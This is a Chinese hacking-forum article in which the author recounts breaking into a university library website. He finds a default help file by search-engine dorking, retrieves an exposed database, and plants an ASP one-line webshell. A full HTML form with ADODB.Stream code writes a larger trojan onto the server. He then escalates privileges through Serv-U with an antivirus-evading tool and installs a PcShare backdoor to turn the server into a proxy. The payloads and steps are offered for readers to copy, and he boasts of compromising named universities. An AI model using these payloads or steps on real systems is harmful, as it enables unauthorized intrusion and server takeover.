频道栏目
首页 > 资讯 > 网站安全 > 正文

小思路得到大权限

06-12-20        来源:[db:作者]  
收藏   我要投稿

看到了一篇 又一篇文章 都是些老思路 没什么新意.... 
不过看到了一个 觉得可以利用的文章 (忘了是黑防还是 手册上的文章了)

作者是在baidu和google上搜索 inurl: read.txt 然后拿到一堆 webshell 

呵呵 这个家伙真是机灵 把我N年前的思路给搬到黑防上去了 早知道我应该申请专利

其实 大伙搜索 inurl:使用帮助.txt 这个会更有用的.... 会搜索出很多 中文的站点 

我今天实在郁闷到极点了,就上google一阵狂搜 翻了几十页后 突然眼睛一亮,发现了一个

www.xxx.edu.cn/lib/使用帮助.txt 

呵呵 这下它有的受了 
直接复制 上面的路径 IE打开后 按照里面的说明直接找到默认的管理员账号和密码,管理员账号和密码是:webadmin adminweb 默认路径为 login_webadmin.asp 打开后 麻木的把密码输入到框框 发现管理员密码不对 真是书山有路勤为径啊 一不小心发现了 web/data/database/db.lib/webadmin.asa 这不是传说中的 数据库么 ---------呵呵 得来全不费功夫. 复制好路径 打开显示乱码 这下好了 打开它的图书馆网站 注册会员后 找到可写的目录 插入 一句话 <%execute request("cnlnfjhh")%> 应该已经插到数据库中了 因为说明里面就只有这么一个默认数据库 呵呵

然后 把下面的 代码:

<form action=http://www.XXX.edu.cn/lib/xxx.asp method=post> //注:xxx.asp为数据库,也就 是你至少要知道数据库路径//
<textarea name=cnlnfjhh cols=120 rows=10 width=45> 
set lP=server.CreateObject("Adodb.Stream") 
lP.Open 
lP.Type=2 
lP.CharSet="gb2312" 
lP.writetext request("p") 
lP.SaveToFile server.mappath("temp.asp"),2 
lP.Close 
set lP=nothing 
response.redirect "temp.asp" 
</textarea> 
<textarea name=p cols=120 rows=10 width=45></textarea><BR><center><br> 
<input type=submit value=提交>”

保存为 html的页子 用记事本打开 把插入过马的 asp页子 替换上面的<form action=http://www.XXX.edu.cn/lib/xxx.asp method=post> 里的路径.

写入大马 submit 提交 呵呵 一个shell 到了 进去后翻了翻 服务器里有 serv-u 6.0.1 呵呵 找到 可写的目录 上传自己免杀的
su.exe 提权 然后 执行 偶Cn 自己免杀了快一年的一个 pcshare服务端 过了 半分钟 一个肉鸡 在客户端上 "咚咚"的上线了 
看了看配制 03的 2G内存 4块CPU 速度非常快~ 做了个代理 擦完PP 走人...................

上面是偶的入侵大概经过 方法是04年的 不过思路值得大家借鉴...呵呵 

由于很多 管理员用的整站程序 自己懒的修改一下 所以 里面默认的数据库和管理员 就会暴露出来.给我们的入侵 多了一个 旁器.

记得在04年的时候:西安交通大学 西北工业大学 清华大学的图书馆ect........ 都是我曾经通过此方法拿下的 汗一个  .

相关TAG标签
上一篇:谁在控制我们的浏览器?
下一篇:sql注入绝技—建立虚拟目录
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站